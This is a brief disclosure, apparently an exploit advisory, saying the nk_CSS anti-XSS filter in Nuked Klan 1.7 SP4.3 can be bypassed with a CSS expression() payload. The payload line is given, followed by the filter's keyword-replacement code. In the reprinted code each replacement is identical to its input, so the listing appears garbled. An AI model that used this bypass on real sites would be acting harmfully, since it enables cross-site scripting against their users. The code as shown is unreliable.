Nuked Klan 1.7 SP4.3 : Function Anti-XSS Bypassed
// *- BEGIN -*
// By Blwood
// http://blwood.net <http://blwood.net/>
We can bypassed the function anti-xss called nk_CSS ( nuked.php) using
like this :
<b id="blwood" style="width:expression(alert(' http://www.blwood.net'))
<http://www.blwood.net%27%29%29/>"></b>
Here is the function :
function nk_CSS($str)
{
if ($str != "")
{
$str =
eregi_replace("content-disposition:","content-disposition:",$str);
$str =
eregi_replace("content-type:","content-type:",$str);
$str =
eregi_replace("content-transfer-encoding:","content-transfer-encoding:",$str);
$str =
eregi_replace("include","include",$str);
$str = eregi_replace("\<\?","<?",$str);
$str = eregi_replace("<\?php","<?php",$str);
$str = eregi_replace("\?\>","?>",$str);
$str =
eregi_replace("script","script",$str);
$str = eregi_replace("eval","eval",$str);
$str =
eregi_replace("javascript","javascript",$str);
$str = eregi_replace("embed","embed",$str);
$str =
eregi_replace("iframe","iframe",$str);
$str = eregi_replace("refresh",
"refresh", $str);
$str = eregi_replace("onload", "onload",
$str);
$str = eregi_replace("onstart",
"onstart", $str);
$str = eregi_replace("onerror",
"onerror", $str);
$str = eregi_replace("onabort",
"onabort", $str);
$str = eregi_replace("onblur", "onblur",
$str);
$str = eregi_replace("onchange",
"onchange", $str);
$str = eregi_replace("onclick",
"onclick", $str);
$str = eregi_replace("ondblclick",
"ondblclick", $str);
$str = eregi_replace("onfocus",
"onfocus", $str);
$str = eregi_replace("onkeydown",
"onkeydown", $str);
$str = eregi_replace("onkeypress",
"onkeypress", $str);
$str = eregi_replace("onkeyup",
"onkeyup", $str);
$str = eregi_replace("onmousedown",
"onmousedown", $str);
$str = eregi_replace("onmousemove",
"onmousemove", $str);
$str = eregi_replace("onmouseover",
"onmouseover", $str);
$str = eregi_replace("onmouseout",
"onmouseout", $str);
$str = eregi_replace("onmouseup",
"onmouseup", $str);
$str = eregi_replace("onreset",
"onreset", $str);
$str = eregi_replace("onselect",
"onselect", $str);
$str = eregi_replace("onsubmit",
"onsubmit", $str);
$str = eregi_replace("onunload",
"onunload", $str);
$str = eregi_replace("document",
"document", $str);
$str = eregi_replace("cookie", "cookie",
$str);
$str = eregi_replace("vbscript",
"vbscript", $str);
$str = eregi_replace("location",
"location", $str);
$str = eregi_replace("object", "object",
$str);
$str = eregi_replace("vbs", "vbs", $str);
$str = eregi_replace("href", "href", $str);
$str = eregi_replace("src", "src", $str);
}
return($str);
}
// *- END -*